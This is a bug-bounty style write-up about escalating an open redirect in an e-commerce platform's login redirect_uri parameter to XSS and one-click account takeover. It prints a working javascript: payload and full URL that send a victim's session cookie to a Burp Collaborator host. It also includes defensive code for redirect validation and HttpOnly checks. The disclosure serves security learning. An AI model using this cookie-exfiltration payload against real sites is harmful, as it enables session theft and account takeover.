From Open Redirect to 1-Click Account Takeover

Hi everyone, I hope you're doing well. In this article, I will share my findings on how I escalated an Open Redirect vulnerability to a 1-click account takeover.

Target

The target is an online platform designed to help businesses manage their e-commerce operations more efficiently. It offers a suite of tools and services aimed at streamlining various aspects of online business management, including inventory management, order processing, product listing, and multi-channel integration. Here are some key features of the target:

  1. Inventory Management: Provides tools to manage inventory across multiple e-commerce platforms from a single dashboard. This helps businesses keep track of stock levels, avoid overselling, and streamline restocking processes.

  2. Order Management: The platform allows businesses to handle orders from various sales channels in one place, simplifying the process of tracking and fulfilling orders.

  3. Multi-Channel Integration: Supports integration with multiple e-commerce platforms and marketplaces, such as Shopee, Lazada, Tokopedia, and others. This enables businesses to manage all their sales channels from one centralized system.

  4. Product Listing Management: Users can create and manage product listings across different marketplaces, ensuring consistency and saving time on manual updates.

  5. Analytics and Reporting: The platform offers analytics and reporting tools to provide insights into sales performance, inventory levels, and other key metrics, helping businesses make informed decisions.

  6. Automated Processes: Automates various tasks such as updating stock levels, synchronizing product information, and processing orders, which helps reduce manual effort and the risk of errors.

Overall, the target aims to simplify e-commerce management for businesses, allowing them to focus more on growth and customer satisfaction by handling the complexities of operating across multiple online platforms.

The Vulnerability

To access the app, users must log in. Clicking the login button took me to this endpoint: https://accounts.target.com/?country=ID&from=OFFICIAL_SITE&language=id&redirect_uri=.

The redirect_uri parameter looked like an Open Redirect candidate, i.e. a way to send users to a malicious website after login, and it was: the website accepted an arbitrary external URL there. I wanted to increase the impact, so I tested whether the same parameter would also accept a javascript: URI, using the payload javascript:alert(1);. It executed, so the redirect sink was vulnerable to XSS as well. Interesting!

Escalating the Attack

The website authorized requests with an Authorization header. Among the cookies I found iam_token, whose value was identical to the Authorization header value, which meant that whoever held the cookie could access the account. I built an XSS payload to exfiltrate the cookies:

javascript:window.location.href='http://xxxxxxxxxxx.burpcollaborator.net/?'+document.cookie;

So, the final payload looked like this:

https://accounts.target.com/?country=ID&from=OFFICIAL_SITE&language=id&redirect_uri=javascript:window.location.href='http://xxxxxxxxxxxxx.burpcollaborator.net/?'+document.cookie;&system_id=SYS_ERP

Proof of Concept (PoC):

  1. I sent this malicious URL endpoint to the victim

  2. The victim logged into their account

  3. The XSS payload was executed

  4. The cookies appeared on my server

  5. I used those cookies to log into the victim's account

  6. This resulted in a 1-click account takeover.
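The chain above works because the login page hands the raw redirect_uri value to a navigation sink, and because the session cookie is readable by script. The following is an added example, not the target's code, showing that vulnerable pattern next to a hardened redirect validator and a check for the cookie attribute that would have blocked the theft; the origin, parameter names and Set-Cookie sample are constructed assumptions.

```javascript
// Application origin is an assumed placeholder, not the real target.
const APP_ORIGIN = "https://app.target.example";

// Vulnerable pattern: the query value goes straight to the sink, e.g.
// window.location.href = vulnerableRedirectTarget(params.get("redirect_uri")).
// A "javascript:" value runs as script in the login page's origin; an
// external https URL turns the login flow into an open redirect.
function vulnerableRedirectTarget(redirectUri) {
  return redirectUri;
}

// Hardened: parse the value relative to our own origin, then allow only
// https URLs whose origin is exactly APP_ORIGIN. Anything else falls back
// to the default landing page instead of being treated as a destination.
function safeRedirectTarget(redirectUri, fallback = APP_ORIGIN + "/") {
  if (typeof redirectUri !== "string" || redirectUri.length === 0) return fallback;
  let url;
  try {
    // "/dashboard" resolves to an app URL; "javascript:...", "//evil.example"
    // and "https://evil.example" keep their own scheme and host.
    url = new URL(redirectUri, APP_ORIGIN);
  } catch (e) {
    return fallback; // unparsable input
  }
  // protocol is normalized to lower case, so "JavaScript:" is caught too;
  // this rejects javascript:, data:, and plain http:.
  if (url.protocol !== "https:") return fallback;
  // Exact origin match blocks //evil.example, host-suffix look-alikes and
  // userinfo tricks such as https://app.target.example@evil.example/.
  if (url.origin !== APP_ORIGIN) return fallback;
  return url.href;
}

// The cookie exfiltration only works because iam_token is visible to
// document.cookie. A session cookie set with HttpOnly is not. This checks a
// Set-Cookie header value for that attribute (case-insensitive).
function sessionCookieReadableByScript(setCookieHeader) {
  const attrs = setCookieHeader.split(";").slice(1).map((a) => a.trim().toLowerCase());
  return !attrs.includes("httponly");
}

// Constructed sample header, shaped like the weak setting described above.
const SAMPLE_SET_COOKIE = "iam_token=<placeholder-token>; Path=/; Secure; SameSite=Lax";
```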

The bug has been reported to the company, but there has been no response from them. I hope you found this informative. Keep learning and stay silent.